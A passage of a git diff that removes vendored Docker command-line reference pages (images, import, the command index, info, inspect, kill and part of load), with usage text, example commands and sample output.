-that restricts the list to images that match the argument. If you specify
-`REPOSITORY`but no `TAG`, the `docker images` command lists all images in the
-given repository.
-
-For example, to list all images in the "java" repository, run this command :
-
-    $ docker images java
-    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
-    java                8                   308e519aac60        6 days ago          824.5 MB
-    java                7                   493d82594c15        3 months ago        656.3 MB
-    java                latest              2711b1d6f3aa        5 months ago        603.9 MB
-
-The `[REPOSITORY[:TAG]]` value must be an "exact match". This means that, for example,
-`docker images jav` does not match the image `java`.
-
-If both `REPOSITORY` and `TAG` are provided, only images matching that
-repository and tag are listed.  To find all local images in the "java"
-repository with tag "8" you can use:
-
-    $ docker images java:8
-    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
-    java                8                   308e519aac60        6 days ago          824.5 MB
-
-If nothing matches `REPOSITORY[:TAG]`, the list is empty.
-
-    $ docker images java:0
-    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
-
-## Listing the full length image IDs
-
-    $ docker images --no-trunc
-    REPOSITORY                    TAG                 IMAGE ID                                                                  CREATED             SIZE
-    <none>                        <none>              sha256:77af4d6b9913e693e8d0b4b294fa62ade6054e6b2f1ffb617ac955dd63fb0182   19 hours ago        1.089 GB
-    committest                    latest              sha256:b6fa739cedf5ea12a620a439402b6004d057da800f91c7524b5086a5e4749c9f   19 hours ago        1.089 GB
-    <none>                        <none>              sha256:78a85c484f71509adeaace20e72e941f6bdd2b25b4c75da8693efd9f61a37921   19 hours ago        1.089 GB
-    docker                        latest              sha256:30557a29d5abc51e5f1d5b472e79b7e296f595abcf19fe6b9199dbbc809c6ff4   20 hours ago        1.089 GB
-    <none>                        <none>              sha256:0124422dd9f9cf7ef15c0617cda3931ee68346455441d66ab8bdc5b05e9fdce5   20 hours ago        1.089 GB
-    <none>                        <none>              sha256:18ad6fad340262ac2a636efd98a6d1f0ea775ae3d45240d3418466495a19a81b   22 hours ago        1.082 GB
-    <none>                        <none>              sha256:f9f1e26352f0a3ba6a0ff68167559f64f3e21ff7ada60366e2d44a04befd1d3a   23 hours ago        1.089 GB
-    tryout                        latest              sha256:2629d1fa0b81b222fca63371ca16cbf6a0772d07759ff80e8d1369b926940074   23 hours ago        131.5 MB
-    <none>                        <none>              sha256:5ed6274db6ceb2397844896966ea239290555e74ef307030ebb01ff91b1914df   24 hours ago        1.089 GB
-
-## Listing image digests
-
-Images that use the v2 or later format have a content-addressable identifier
-called a `digest`. As long as the input used to generate the image is
-unchanged, the digest value is predictable. To list image digest values, use
-the `--digests` flag:
-
-    $ docker images --digests
-    REPOSITORY                         TAG                 DIGEST                                                                    IMAGE ID            CREATED             SIZE
-    localhost:5000/test/busybox        <none>              sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf   4986bf8c1536        9 weeks ago         2.43 MB
-
-When pushing or pulling to a 2.0 registry, the `push` or `pull` command
-output includes the image digest. You can `pull` using a digest value. You can
-also reference by digest in `create`, `run`, and `rmi` commands, as well as the
-`FROM` image reference in a Dockerfile.
-
-## Filtering
-
-The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more
-than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`)
-
-The currently supported filters are:
-
-* dangling (boolean - true or false)
-* label (`label=<key>` or `label=<key>=<value>`)
-* before (`<image-name>[:<tag>]`,  `<image id>` or `<image@digest>`) - filter images created before given id or references
-* since (`<image-name>[:<tag>]`,  `<image id>` or `<image@digest>`) - filter images created since given id or references
-
-##### Untagged images (dangling)
-
-    $ docker images --filter "dangling=true"
-
-    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
-    <none>              <none>              8abc22fbb042        4 weeks ago         0 B
-    <none>              <none>              48e5f45168b9        4 weeks ago         2.489 MB
-    <none>              <none>              bf747efa0e2f        4 weeks ago         0 B
-    <none>              <none>              980fe10e5736        12 weeks ago        101.4 MB
-    <none>              <none>              dea752e4e117        12 weeks ago        101.4 MB
-    <none>              <none>              511136ea3c5a        8 months ago        0 B
-
-This will display untagged images, that are the leaves of the images tree (not
-intermediary layers). These images occur when a new build of an image takes the
-`repo:tag` away from the image ID, leaving it as `<none>:<none>` or untagged.
-A warning will be issued if trying to remove an image when a container is presently
-using it. By having this flag it allows for batch cleanup.
-
-Ready for use by `docker rmi ...`, like:
-
-    $ docker rmi $(docker images -f "dangling=true" -q)
-
-    8abc22fbb042
-    48e5f45168b9
-    bf747efa0e2f
-    980fe10e5736
-    dea752e4e117
-    511136ea3c5a
-
-NOTE: Docker will warn you if any containers exist that are using these untagged images.
-
-
-##### Labeled images
-
-The `label` filter matches images based on the presence of a `label` alone or a `label` and a
-value.
-
-The following filter matches images with the `com.example.version` label regardless of its value.
-
-    $ docker images --filter "label=com.example.version"
-
-    REPOSITORY          TAG                 IMAGE ID            CREATED              SIZE
-    match-me-1          latest              eeae25ada2aa        About a minute ago   188.3 MB
-    match-me-2          latest              dea752e4e117        About a minute ago   188.3 MB
-
-The following filter matches images with the `com.example.version` label with the `1.0` value.
-
-    $ docker images --filter "label=com.example.version=1.0"
-    REPOSITORY          TAG                 IMAGE ID            CREATED              SIZE
-    match-me            latest              511136ea3c5a        About a minute ago   188.3 MB
-
-In this example, with the `0.1` value, it returns an empty set because no matches were found.
-
-    $ docker images --filter "label=com.example.version=0.1"
-    REPOSITORY          TAG                 IMAGE ID            CREATED              SIZE
-
-#### Before
-
-The `before` filter shows only images created before the image with
-given id or reference. For example, having these images:
-
-    $ docker images
-    REPOSITORY          TAG                 IMAGE ID            CREATED              SIZE
-    image1              latest              eeae25ada2aa        4 minutes ago        188.3 MB
-    image2              latest              dea752e4e117        9 minutes ago        188.3 MB
-    image3              latest              511136ea3c5a        25 minutes ago       188.3 MB
-
-Filtering with `before` would give:
-
-    $ docker images --filter "before=image1"
-    REPOSITORY          TAG                 IMAGE ID            CREATED              SIZE
-    image2              latest              dea752e4e117        9 minutes ago        188.3 MB
-    image3              latest              511136ea3c5a        25 minutes ago       188.3 MB
-
-#### Since
-
-The `since` filter shows only images created after the image with
-given id or reference. For example, having these images:
-
-    $ docker images
-    REPOSITORY          TAG                 IMAGE ID            CREATED              SIZE
-    image1              latest              eeae25ada2aa        4 minutes ago        188.3 MB
-    image2              latest              dea752e4e117        9 minutes ago        188.3 MB
-    image3              latest              511136ea3c5a        25 minutes ago       188.3 MB
-
-Filtering with `since` would give:
-
-    $ docker images --filter "since=image3"
-    REPOSITORY          TAG                 IMAGE ID            CREATED              SIZE
-    image1              latest              eeae25ada2aa        4 minutes ago        188.3 MB
-    image2              latest              dea752e4e117        9 minutes ago        188.3 MB
-
-#### Reference
-
-The `reference` filter shows only images whose reference matches
-the specified pattern.
-
-    $ docker images
-    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
-    busybox             latest              e02e811dd08f        5 weeks ago         1.09 MB
-    busybox             uclibc              e02e811dd08f        5 weeks ago         1.09 MB
-    busybox             musl                733eb3059dce        5 weeks ago         1.21 MB
-    busybox             glibc               21c16b6787c6        5 weeks ago         4.19 MB
-
-Filtering with `reference` would give:
-
-    $ docker images --filter=reference='busy*:*libc'
-    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
-    busybox             uclibc              e02e811dd08f        5 weeks ago         1.09 MB
-    busybox             glibc               21c16b6787c6        5 weeks ago         4.19 MB
-
-## Formatting
-
-The formatting option (`--format`) will pretty print container output
-using a Go template.
-
-Valid placeholders for the Go template are listed below:
-
-Placeholder | Description
----- | ----
-`.ID` | Image ID
-`.Repository` | Image repository
-`.Tag` | Image tag
-`.Digest` | Image digest
-`.CreatedSince` | Elapsed time since the image was created
-`.CreatedAt` | Time when the image was created
-`.Size` | Image disk size
-
-When using the `--format` option, the `image` command will either
-output the data exactly as the template declares or, when using the
-`table` directive, will include column headers as well.
-
-The following example uses a template without headers and outputs the
-`ID` and `Repository` entries separated by a colon for all images:
-
-    {% raw %}
-    $ docker images --format "{{.ID}}: {{.Repository}}"
-    77af4d6b9913: <none>
-    b6fa739cedf5: committ
-    78a85c484f71: <none>
-    30557a29d5ab: docker
-    5ed6274db6ce: <none>
-    746b819f315e: postgres
-    746b819f315e: postgres
-    746b819f315e: postgres
-    746b819f315e: postgres
-    {% endraw %}
-
-To list all images with their repository and tag in a table format you
-can use:
-
-    {% raw %}
-    $ docker images --format "table {{.ID}}\t{{.Repository}}\t{{.Tag}}"
-    IMAGE ID            REPOSITORY                TAG
-    77af4d6b9913        <none>                    <none>
-    b6fa739cedf5        committ                   latest
-    78a85c484f71        <none>                    <none>
-    30557a29d5ab        docker                    latest
-    5ed6274db6ce        <none>                    <none>
-    746b819f315e        postgres                  9
-    746b819f315e        postgres                  9.3
-    746b819f315e        postgres                  9.3.5
-    746b819f315e        postgres                  latest
-    {% endraw %}
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/import.md b/vendor/github.com/docker/docker/docs/reference/commandline/import.md
deleted file mode 100644
index 20e90a61fd..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/import.md
+++ /dev/null
@@ -1,75 +0,0 @@
----
-title: "import"
-description: "The import command description and usage"
-keywords: "import, file, system, container"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# import
-
-```markdown
-Usage:  docker import [OPTIONS] file|URL|- [REPOSITORY[:TAG]]
-
-Import the contents from a tarball to create a filesystem image
-
-Options:
-  -c, --change value     Apply Dockerfile instruction to the created image (default [])
-      --help             Print usage
-  -m, --message string   Set commit message for imported image
-```
-
-You can specify a `URL` or `-` (dash) to take data directly from `STDIN`. The
-`URL` can point to an archive (.tar, .tar.gz, .tgz, .bzip, .tar.xz, or .txz)
-containing a filesystem or to an individual file on the Docker host.  If you
-specify an archive, Docker untars it in the container relative to the `/`
-(root). If you specify an individual file, you must specify the full path within
-the host. To import from a remote location, specify a `URI` that begins with the
-`http://` or `https://` protocol.
-
-The `--change` option will apply `Dockerfile` instructions to the image
-that is created.
-Supported `Dockerfile` instructions:
-`CMD`|`ENTRYPOINT`|`ENV`|`EXPOSE`|`ONBUILD`|`USER`|`VOLUME`|`WORKDIR`
-
-## Examples
-
-**Import from a remote location:**
-
-This will create a new untagged image.
-
-    $ docker import http://example.com/exampleimage.tgz
-
-**Import from a local file:**
-
-Import to docker via pipe and `STDIN`.
-
-    $ cat exampleimage.tgz | docker import - exampleimagelocal:new
-
-Import with a commit message.
-
-    $ cat exampleimage.tgz | docker import --message "New image imported from tarball" - exampleimagelocal:new
-
-Import to docker from a local archive.
-
-    $ docker import /path/to/exampleimage.tgz
-
-**Import from a local directory:**
-
-    $ sudo tar -c . | docker import - exampleimagedir
-
-**Import from a local directory with new configurations:**
-
-    $ sudo tar -c . | docker import --change "ENV DEBUG true" - exampleimagedir
-
-Note the `sudo` in this example – you must preserve
-the ownership of the files (especially root ownership) during the
-archiving with tar. If you are not root (or the sudo command) when you
-tar, then the ownerships might not get preserved.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/index.md b/vendor/github.com/docker/docker/docs/reference/commandline/index.md
deleted file mode 100644
index 952fa09df1..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/index.md
+++ /dev/null
@@ -1,178 +0,0 @@
----
-title: "Docker commands"
-description: "Docker's CLI command description and usage"
-keywords: "Docker, Docker documentation, CLI, command line"
-identifier: "smn_cli_guide"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# The Docker commands
-
-This section contains reference information on using Docker's command line
-client. Each command has a reference page along with samples. If you are
-unfamiliar with the command line, you should start by reading about how to [Use
-the Docker command line](cli.md).
-
-You start the Docker daemon with the command line. How you start the daemon
-affects your Docker containers. For that reason you should also make sure to
-read the [`dockerd`](dockerd.md) reference page.
-
-### Docker management commands
-
-| Command | Description                                                        |
-|:--------|:-------------------------------------------------------------------|
-| [dockerd](dockerd.md) | Launch the Docker daemon                             |
-| [info](info.md) | Display system-wide information                            |
-| [inspect](inspect.md)| Return low-level information on a container or image  |
-| [version](version.md) | Show the Docker version information                  |
-
-
-### Image commands
-
-| Command | Description                                                        |
-|:--------|:-------------------------------------------------------------------|
-| [build](build.md) |  Build an image from a Dockerfile                        |
-| [commit](commit.md) | Create a new image from a container's changes          |
-| [history](history.md) | Show the history of an image                         |
-| [images](images.md) | List images                                            |
-| [import](import.md) | Import the contents from a tarball to create a filesystem image |
-| [load](load.md) | Load an image from a tar archive or STDIN                  |
-| [rmi](rmi.md) | Remove one or more images                                    |
-| [save](save.md) | Save images to a tar archive                               |
-| [tag](tag.md) | Tag an image into a repository                               |
-
-### Container commands
-
-| Command | Description                                                        |
-|:--------|:-------------------------------------------------------------------|
-| [attach](attach.md) | Attach to a running container                          |
-| [cp](cp.md) | Copy files/folders from a container to a HOSTDIR or to STDOUT  |
-| [create](create.md) | Create a new container                                 |
-| [diff](diff.md) | Inspect changes on a container's filesystem                |
-| [events](events.md) | Get real time events from the server                   |
-| [exec](exec.md) | Run a command in a running container                       |
-| [export](export.md) | Export a container's filesystem as a tar archive       |
-| [kill](kill.md) | Kill a running container                                   |
-| [logs](logs.md) | Fetch the logs of a container                              |
-| [pause](pause.md) | Pause all processes within a container                   |
-| [port](port.md) | List port mappings or a specific mapping for the container |
-| [ps](ps.md) | List containers                                                |
-| [rename](rename.md) | Rename a container                                     |
-| [restart](restart.md) | Restart a running container                          |
-| [rm](rm.md) | Remove one or more containers                                  |
-| [run](run.md) | Run a command in a new container                             |
-| [start](start.md) | Start one or more stopped containers                     |
-| [stats](stats.md) | Display a live stream of container(s) resource usage  statistics |
-| [stop](stop.md) | Stop a running container                                   |
-| [top](top.md) | Display the running processes of a container                 |
-| [unpause](unpause.md) | Unpause all processes within a container             |
-| [update](update.md) | Update configuration of one or more containers         |
-| [wait](wait.md) | Block until a container stops, then print its exit code    |
-
-### Hub and registry commands
-
-| Command | Description                                                        |
-|:--------|:-------------------------------------------------------------------|
-| [login](login.md) | Register or log in to a Docker registry                  |
-| [logout](logout.md) | Log out from a Docker registry                         |
-| [pull](pull.md) | Pull an image or a repository from a Docker registry       |
-| [push](push.md) | Push an image or a repository to a Docker registry         |
-| [search](search.md) | Search the Docker Hub for images                       |
-
-### Network and connectivity commands
-
-| Command | Description                                                        |
-|:--------|:-------------------------------------------------------------------|
-| [network connect](network_connect.md) | Connect a container to a network     |
-| [network create](network_create.md) | Create a new network                   |
-| [network disconnect](network_disconnect.md) | Disconnect a container from a network |
-| [network inspect](network_inspect.md) | Display information about a network  |
-| [network ls](network_ls.md) | Lists all the networks the Engine `daemon` knows about |
-| [network rm](network_rm.md) | Removes one or more networks                   |
-
-
-### Shared data volume commands
-
-| Command | Description                                                        |
-|:--------|:-------------------------------------------------------------------|
-| [volume create](volume_create.md) | Creates a new volume where containers can consume and store data |
-| [volume inspect](volume_inspect.md) | Display information about a volume     |
-| [volume ls](volume_ls.md) | Lists all the volumes Docker knows about         |
-| [volume prune](volume_prune.md) | Remove all unused volumes                  |
-| [volume rm](volume_rm.md) | Remove one or more volumes                       |
-
-
-### Swarm node commands
-
-| Command | Description                                                        |
-|:--------|:-------------------------------------------------------------------|
-| [node promote](node_promote.md) | Promote a node that is pending a promotion to manager |
-| [node demote](node_demote.md) | Demotes an existing manager so that it is no longer a manager |
-| [node inspect](node_inspect.md) | Inspect a node in the swarm                |
-| [node update](node_update.md) | Update attributes for a node                 |
-| [node ps](node_ps.md) | List tasks running on one or more nodes                         |
-| [node ls](node_ls.md) | List nodes in the swarm                              |
-| [node rm](node_rm.md) | Remove one or more nodes from the swarm                         |
-
-### Swarm swarm commands
-
-| Command | Description                                                        |
-|:--------|:-------------------------------------------------------------------|
-| [swarm init](swarm_init.md) | Initialize a swarm                             |
-| [swarm join](swarm_join.md) | Join a swarm as a manager node or worker node  |
-| [swarm leave](swarm_leave.md) | Remove the current node from the swarm       |
-| [swarm update](swarm_update.md) | Update attributes of a swarm               |
-| [swarm join-token](swarm_join_token.md) | Display or rotate join tokens      |
-
-### Swarm service commands
-
-| Command | Description                                                        |
-|:--------|:-------------------------------------------------------------------|
-| [service create](service_create.md) | Create a new service                   |
-| [service inspect](service_inspect.md) | Inspect a service                    |
-| [service ls](service_ls.md) | List services in the swarm                     |
-| [service rm](service_rm.md) | Remove a service from the swarm                |
-| [service scale](service_scale.md) | Set the number of replicas for the desired state of the service |
-| [service ps](service_ps.md) | List the tasks of a service              |
-| [service update](service_update.md)  | Update the attributes of a service    |
-
-### Swarm secret commands
-
-| Command | Description                                                        |
-|:--------|:-------------------------------------------------------------------|
-| [secret create](secret_create.md) | Create a secret from a file or STDIN as content |
-| [secret inspect](service_inspect.md) | Inspect the specified secret          |
-| [secret ls](secret_ls.md) | List secrets in the swarm                        |
-| [secret rm](secret_rm.md) | Remove the specified secrets from the swarm      |
-
-### Swarm stack commands
-
-| Command | Description                                                        |
-|:--------|:-------------------------------------------------------------------|
-| [stack deploy](stack_deploy.md) | Deploy a new stack or update an existing stack |
-| [stack ls](stack_ls.md) | List stacks in the swarm                           |
-| [stack ps](stack_ps.md) | List the tasks in the stack                        |
-| [stack rm](stack_rm.md) | Remove the stack from the swarm                    |
-| [stack services](stack_services.md) | List the services in the stack         |
-
-### Plugin commands
-
-| Command | Description                                                        |
-|:--------|:-------------------------------------------------------------------|
-| [plugin create](plugin_create.md) | Create a plugin from a rootfs and configuration |
-| [plugin disable](plugin_disable.md) | Disable a plugin                       |
-| [plugin enbale](plugin_enable.md)  | Enable a plugin                         |
-| [plugin inspect](plugin_inspect.md) | Display detailed information on a plugin |
-| [plugin install](plugin_install.md) | Install a plugin                       |
-| [plugin ls](plugin_ls.md) | List plugins                                     |
-| [plugin push](plugin_push.md) | Push a plugin to a registry                  |
-| [plugin rm](plugin_rm.md) | Remove a plugin                                  |
-| [plugin set](plugin_set.md)  | Change settings for a plugin                  |
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/info.md b/vendor/github.com/docker/docker/docs/reference/commandline/info.md
deleted file mode 100644
index 50a084fcb2..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/info.md
+++ /dev/null
@@ -1,224 +0,0 @@
----
-title: "info"
-description: "The info command description and usage"
-keywords: "display, docker, information"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# info
-
-```markdown
-Usage:  docker info [OPTIONS]
-
-Display system-wide information
-
-Options:
-  -f, --format string   Format the output using the given Go template
-      --help            Print usage
-```
-
-This command displays system wide information regarding the Docker installation.
-Information displayed includes the kernel version, number of containers and images.
-The number of images shown is the number of unique images. The same image tagged
-under different names is counted only once.
-
-If a format is specified, the given template will be executed instead of the
-default format. Go's [text/template](http://golang.org/pkg/text/template/) package
-describes all the details of the format.
-
-Depending on the storage driver in use, additional information can be shown, such
-as pool name, data file, metadata file, data space used, total data space, metadata
-space used, and total metadata space.
-
-The data file is where the images are stored and the metadata file is where the
-meta data regarding those images are stored. When run for the first time Docker
-allocates a certain amount of data space and meta data space from the space
-available on the volume where `/var/lib/docker` is mounted.
-
-# Examples
-
-## Display Docker system information
-
-Here is a sample output for a daemon running on Ubuntu, using the overlay2
-storage driver and a node that is part of a 2-node swarm:
-
-    $ docker -D info
-    Containers: 14
-     Running: 3
-     Paused: 1
-     Stopped: 10
-    Images: 52
-    Server Version: 1.13.0
-    Storage Driver: overlay2
-     Backing Filesystem: extfs
-     Supports d_type: true
-     Native Overlay Diff: false
-    Logging Driver: json-file
-    Cgroup Driver: cgroupfs
-    Plugins:
-     Volume: local
-     Network: bridge host macvlan null overlay
-    Swarm: active
-     NodeID: rdjq45w1op418waxlairloqbm
-     Is Manager: true
-     ClusterID: te8kdyw33n36fqiz74bfjeixd
-     Managers: 1
-     Nodes: 2
-     Orchestration:
-      Task History Retention Limit: 5
-     Raft:
-      Snapshot Interval: 10000
-      Number of Old Snapshots to Retain: 0
-      Heartbeat Tick: 1
-      Election Tick: 3
-     Dispatcher:
-      Heartbeat Period: 5 seconds
-     CA Configuration:
-      Expiry Duration: 3 months
-     Node Address: 172.16.66.128 172.16.66.129
-     Manager Addresses:
-      172.16.66.128:2477
-    Runtimes: runc
-    Default Runtime: runc
-    Init Binary: docker-init
-    containerd version: 8517738ba4b82aff5662c97ca4627e7e4d03b531
-    runc version: ac031b5bf1cc92239461125f4c1ffb760522bbf2
-    init version: N/A (expected: v0.13.0)
-    Security Options:
-     apparmor
-     seccomp
-      Profile: default
-    Kernel Version: 4.4.0-31-generic
-    Operating System: Ubuntu 16.04.1 LTS
-    OSType: linux
-    Architecture: x86_64
-    CPUs: 2
-    Total Memory: 1.937 GiB
-    Name: ubuntu
-    ID: H52R:7ZR6:EIIA:76JG:ORIY:BVKF:GSFU:HNPG:B5MK:APSC:SZ3Q:N326
-    Docker Root Dir: /var/lib/docker
-    Debug Mode (client): true
-    Debug Mode (server): true
-     File Descriptors: 30
-     Goroutines: 123
-     System Time: 2016-11-12T17:24:37.955404361-08:00
-     EventsListeners: 0
-    Http Proxy: http://test:test@proxy.example.com:8080
-    Https Proxy: https://test:test@proxy.example.com:8080
-    No Proxy: localhost,127.0.0.1,docker-registry.somecorporation.com
-    Registry: https://index.docker.io/v1/
-    WARNING: No swap limit support
-    Labels:
-     storage=ssd
-     staging=true
-    Experimental: false
-    Insecure Registries:
-     127.0.0.0/8
-    Registry Mirrors:
-      http://192.168.1.2/
-      http://registry-mirror.example.com:5000/
-    Live Restore Enabled: false
-
-The global `-D` option tells all `docker` commands to output debug information.
-
-The example below shows the output for a daemon running on Red Hat Enterprise Linux,
-using the devicemapper storage driver. As can be seen in the output, additional
-information about the devicemapper storage driver is shown:
-
-    $ docker info
-    Containers: 14
-     Running: 3
-     Paused: 1
-     Stopped: 10
-    Images: 52
-    Server Version: 1.10.3
-    Storage Driver: devicemapper
-     Pool Name: docker-202:2-25583803-pool
-     Pool Blocksize: 65.54 kB
-     Base Device Size: 10.74 GB
-     Backing Filesystem: xfs
-     Data file: /dev/loop0
-     Metadata file: /dev/loop1
-     Data Space Used: 1.68 GB
-     Data Space Total: 107.4 GB
-     Data Space Available: 7.548 GB
-     Metadata Space Used: 2.322 MB
-     Metadata Space Total: 2.147 GB
-     Metadata Space Available: 2.145 GB
-     Udev Sync Supported: true
-     Deferred Removal Enabled: false
-     Deferred Deletion Enabled: false
-     Deferred Deleted Device Count: 0
-     Data loop file: /var/lib/docker/devicemapper/devicemapper/data
-     Metadata loop file: /var/lib/docker/devicemapper/devicemapper/metadata
-     Library Version: 1.02.107-RHEL7 (2015-12-01)
-    Execution Driver: native-0.2
-    Logging Driver: json-file
-    Plugins:
-     Volume: local
-     Network: null host bridge
-    Kernel Version: 3.10.0-327.el7.x86_64
-    Operating System: Red Hat Enterprise Linux Server 7.2 (Maipo)
-    OSType: linux
-    Architecture: x86_64
-    CPUs: 1
-    Total Memory: 991.7 MiB
-    Name: ip-172-30-0-91.ec2.internal
-    ID: I54V:OLXT:HVMM:TPKO:JPHQ:CQCD:JNLC:O3BZ:4ZVJ:43XJ:PFHZ:6N2S
-    Docker Root Dir: /var/lib/docker
-    Debug mode (client): false
-    Debug mode (server): false
-    Username: gordontheturtle
-    Registry: https://index.docker.io/v1/
-    Insecure registries:
-     myinsecurehost:5000
-     127.0.0.0/8
-
-You can also specify the output format:
-
-    $ docker info --format '{{json .}}'
-	{"ID":"I54V:OLXT:HVMM:TPKO:JPHQ:CQCD:JNLC:O3BZ:4ZVJ:43XJ:PFHZ:6N2S","Containers":14, ...}
-
-Here is a sample output for a daemon running on Windows Server 2016:
-
-    E:\docker>docker info
-    Containers: 1
-     Running: 0
-     Paused: 0
-     Stopped: 1
-    Images: 17
-    Server Version: 1.13.0
-    Storage Driver: windowsfilter
-     Windows:
-    Logging Driver: json-file
-    Plugins:
-     Volume: local
-     Network: nat null overlay
-    Swarm: inactive
-    Default Isolation: process
-    Kernel Version: 10.0 14393 (14393.206.amd64fre.rs1_release.160912-1937)
-    Operating System: Windows Server 2016 Datacenter
-    OSType: windows
-    Architecture: x86_64
-    CPUs: 8
-    Total Memory: 3.999 GiB
-    Name: WIN-V0V70C0LU5P
-    ID: NYMS:B5VK:UMSL:FVDZ:EWB5:FKVK:LPFL:FJMQ:H6FT:BZJ6:L2TD:XH62
-    Docker Root Dir: C:\control
-    Debug Mode (client): false
-    Debug Mode (server): false
-    Registry: https://index.docker.io/v1/
-    Insecure Registries:
-     127.0.0.0/8
-    Registry Mirrors:
-      http://192.168.1.2/
-      http://registry-mirror.example.com:5000/
-    Live Restore Enabled: false
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/inspect.md
deleted file mode 100644
index 7a0c3a0871..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/inspect.md
+++ /dev/null
@@ -1,102 +0,0 @@
----
-title: "inspect"
-description: "The inspect command description and usage"
-keywords: "inspect, container, json"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# inspect
-
-```markdown
-Usage:  docker inspect [OPTIONS] NAME|ID [NAME|ID...]
-
-Return low-level information on Docker object(s) (e.g. container, image, volume,
-network, node, service, or task) identified by name or ID
-
-Options:
-  -f, --format       Format the output using the given Go template
-      --help         Print usage
-  -s, --size         Display total file sizes if the type is container
-      --type         Return JSON for specified type
-```
-
-By default, this will render all results in a JSON array. If the container and
-image have the same name, this will return container JSON for unspecified type.
-If a format is specified, the given template will be executed for each result.
-
-Go's [text/template](http://golang.org/pkg/text/template/) package
-describes all the details of the format.
-
-## Examples
-
-**Get an instance's IP address:**
-
-For the most part, you can pick out any field from the JSON in a fairly
-straightforward manner.
-
-    {% raw %}
-    $ docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' $INSTANCE_ID
-    {% endraw %}
-
-**Get an instance's MAC address:**
-
-For the most part, you can pick out any field from the JSON in a fairly
-straightforward manner.
-
-    {% raw %}
-    $ docker inspect --format='{{range .NetworkSettings.Networks}}{{.MacAddress}}{{end}}' $INSTANCE_ID
-    {% endraw %}
-
-**Get an instance's log path:**
-
-    {% raw %}
-    $ docker inspect --format='{{.LogPath}}' $INSTANCE_ID
-    {% endraw %}
-
-**Get a Task's image name:**
-
-    {% raw %}
-    $ docker inspect --format='{{.Container.Spec.Image}}' $INSTANCE_ID
-    {% endraw %}
-
-**List all port bindings:**
-
-One can loop over arrays and maps in the results to produce simple text
-output:
-
-    {% raw %}
-    $ docker inspect --format='{{range $p, $conf := .NetworkSettings.Ports}} {{$p}} -> {{(index $conf 0).HostPort}} {{end}}' $INSTANCE_ID
-    {% endraw %}
-
-**Find a specific port mapping:**
-
-The `.Field` syntax doesn't work when the field name begins with a
-number, but the template language's `index` function does. The
-`.NetworkSettings.Ports` section contains a map of the internal port
-mappings to a list of external address/port objects. To grab just the
-numeric public port, you use `index` to find the specific port map, and
-then `index` 0 contains the first object inside of that. Then we ask for
-the `HostPort` field to get the public address.
-
-    {% raw %}
-    $ docker inspect --format='{{(index (index .NetworkSettings.Ports "8787/tcp") 0).HostPort}}' $INSTANCE_ID
-    {% endraw %}
-
-**Get a subsection in JSON format:**
-
-If you request a field which is itself a structure containing other
-fields, by default you get a Go-style dump of the inner values.
-Docker adds a template function, `json`, which can be applied to get
-results in JSON format.
-
-    {% raw %}
-    $ docker inspect --format='{{json .Config}}' $INSTANCE_ID
-    {% endraw %}
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/kill.md b/vendor/github.com/docker/docker/docs/reference/commandline/kill.md
deleted file mode 100644
index 32fde3d8b5..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/kill.md
+++ /dev/null
@@ -1,34 +0,0 @@
----
-title: "kill"
-description: "The kill command description and usage"
-keywords: "container, kill, signal"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# kill
-
-```markdown
-Usage:  docker kill [OPTIONS] CONTAINER [CONTAINER...]
-
-Kill one or more running containers
-
-Options:
-      --help            Print usage
-  -s, --signal string   Signal to send to the container (default "KILL")
-```
-
-The main process inside the container will be sent `SIGKILL`, or any
-signal specified with option `--signal`.
-
-> **Note:**
-> `ENTRYPOINT` and `CMD` in the *shell* form run as a subcommand of `/bin/sh -c`,
-> which does not pass signals. This means that the executable is not the container’s PID 1
-> and does not receive Unix signals.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/load.md b/vendor/github.com/docker/docker/docs/reference/commandline/load.md
deleted file mode 100644
index 04a5bc7e56..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/load.md
+++ /dev/null
@@ -1,53 +0,0 @@
----
-title: "load"
-description: "The load command description and usage"
-keywords: "stdin, tarred, repository"
----
-
-<!-- This file is maintained within the docker/docker Github
